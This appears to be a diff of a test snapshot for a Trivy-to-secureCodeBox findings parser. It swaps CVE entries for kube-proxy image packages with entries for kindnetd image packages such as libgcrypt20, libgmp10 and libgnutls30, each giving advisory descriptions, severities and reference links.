"Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-40528", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "https://access.redhat.com/errata/RHSA-2022:5311", + "https://access.redhat.com/security/cve/CVE-2021-40528", + "https://bugzilla.redhat.com/2002816", + "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "https://errata.rockylinux.org/RLSA-2022:5311", + "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "https://linux.oracle.com/cve/CVE-2021-40528.html", + "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-40528", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "ElGamal implementation allows plaintext recovery", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2021-40528", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "https://access.redhat.com/errata/RHSA-2022:5311", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://access.redhat.com/security/cve/CVE-2021-40528", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://bugzilla.redhat.com/2002816", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://errata.rockylinux.org/RLSA-2022:5311", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-43618", + "installedVersion": "2:6.1.2+dfsg-4", + "packageName": "libgmp10", + "references": [ + "http://seclists.org/fulldisclosure/2022/Oct/8", + "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "https://access.redhat.com/security/cve/CVE-2021-43618", + "https://bugs.debian.org/994405", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "https://security.netapp.com/advisory/ntap-20221111-0001/", + "https://ubuntu.com/security/notices/USN-5672-1", + "https://ubuntu.com/security/notices/USN-5672-2", + "https://www.cve.org/CVERecord?id=CVE-2021-43618", + ], + }, + "category": "Vulnerability", + "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Integer overflow and resultant buffer overflow via crafted input", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://avd.aquasec.com/nvd/cve-2021-43618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "http://seclists.org/fulldisclosure/2022/Oct/8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-43618", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://bugs.debian.org/994405", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://ubuntu.com/security/notices/USN-5672-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-5672-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1292", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20231", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-1292", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - "https://linux.oracle.com/cve/CVE-2022-1292.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220602-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://ubuntu.com/security/notices/USN-5402-1", - "https://ubuntu.com/security/notices/USN-5402-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1292", - "https://www.debian.org/security/2022/dsa-5139", - "https://www.openssl.org/news/secadv/20220503.txt", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2021-20231", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20231.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", ], }, "category": "Vulnerability", - "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "c_rehash script allows command injection", + "name": "gnutls: Use after free in client key_share extension", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1292", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://avd.aquasec.com/nvd/cve-2021-20231", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://access.redhat.com/security/cve/CVE-2021-20231", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20232", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - 